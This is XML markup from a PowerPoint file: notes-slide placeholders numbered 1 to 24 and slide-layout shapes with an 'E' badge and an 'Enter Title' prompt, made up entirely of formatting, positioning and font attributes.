          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5/24/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117725" y="681038"/>
            <a:ext cx="2546350" cy="3398837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678181" y="4307206"/>
            <a:ext cx="5425440" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="5394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12838"/>
            <a:ext cx="2938781" cy="453390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841454" y="8612838"/>
            <a:ext cx="2938781" cy="453390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6567404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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22289640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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11724191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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3382863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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2822086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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34775416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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3743689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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="611487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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1033192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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19935333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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5318423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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37027602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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35213287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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19175550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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28704990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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10444159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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265028907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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8467203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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35614864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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32159023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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12337675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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5714528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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17653457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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23170061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9E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17207005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8" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="83276B"/>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="83276B"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="83276B"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="0"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="40005" dist="22860" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="35000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76199"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:defRPr sz="2800" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="83276B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="none"/>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="36000" tIns="45720" rIns="36000" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="10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3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4A1647"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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9" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="6372000"/>
            <a:ext cx="3383280" cy="2761200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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ts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="83276B"/>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="83276B"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="83276B"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="0"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="40005" dist="22860" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="35000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="54000" tIns="54000" rIns="54000" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76199"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:defRPr sz="2800" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
